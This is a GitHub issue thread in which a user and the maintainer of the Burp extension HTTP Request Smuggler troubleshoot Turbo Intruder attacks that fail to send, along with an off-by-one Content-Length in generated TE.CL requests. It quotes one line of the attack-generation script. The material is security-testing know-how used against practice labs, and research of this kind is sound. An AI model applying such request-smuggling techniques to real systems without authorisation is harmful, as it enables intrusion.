albinowax
commented
2 years ago Can you confirm which version of HTTP Request Smuggler you're using? Did you install it from the bapp store?
Open maxicorbs opened 2 years ago
albinowax
commented
2 years ago Can you confirm which version of HTTP Request Smuggler you're using? Did you install it from the bapp store?
maxicorbs
commented
2 years ago Version v2.01
Got it from the bapp store yep.
Seem to have found a simple workaround by looking through archive.org for what changed in the python script. Reverting the 'engine=Engine.BURP' to 'engine=Engine.THREADED' seems to have fixed for me, but unsure if there will be other repercussions to changing this value?
Also, just want to say a big thanks for your research, papers, tools and maintenance of all things HRS James! You've got me set on finding my first triaged HRS bug
maxicorbs
commented
2 years ago Not sure if this is a direct result of the amdended workaround above, but currently all TECL attacks are being generated with a Content-Length that is 1 too many, i.e Content-Length should be 12 but it is 13. I have got round this by changing
attack = attack.replace('Content-Length: '+content_length, 'Content-length: '+str(int(content_length)+len(chunk_size)-3))
to
attack = attack.replace('Content-Length: '+content_length, 'Content-length: '+str(int(content_length)+len(chunk_size)-4))
Could this be some nuance to the BURP/THREADED workaround?
albinowax
commented
2 years ago Maybe you've got a non-printable character in the request that's breaking the engine and messing up the content-length.
maxicorbs
commented
2 years ago Hmm, can't see anything but that is an easy fix. Are you able to confirm if others are also having the issue with turbo intruder queueing and needing to change the THREADED? If it is just me for whatever reason then i'll close this for you
albinowax
commented
2 years ago Which lab were you having this issue on?
maxicorbs
commented
2 years ago I am still having this issue on multiple instances of the burp plugin, not on any lab in particular. No matter the attack im trying, I can only launch the turbo intruder by changing BURP to THREADED, but by looking at other peoples video demonstrations this appears to fix the issue but cause some performance issues as it runs slower
Not sure if something has changed recently with the script that the plugin inserts into turbo intruder but when I click 'Launch CL.TE/TE.CL attack' I can see the engine starting and the requests queueing but no requests are actually made. Have tried this on multiple lab instances, on 2 different machines with 2 different versions of Burp and consistently get this bug. Have watched plenty of YT videos in which they follow the exact same steps and the requests launch no problem. Screenshots of script and queue attached.
Extension output says:
"The engine has already started - you no longer need to invoke engine.start() manually. If you prefer to invoke engine.start() manually, set autoStart=False in the constructor Cancelled attack Attack aborted with items waiting to be queued."
No requests in Logger++
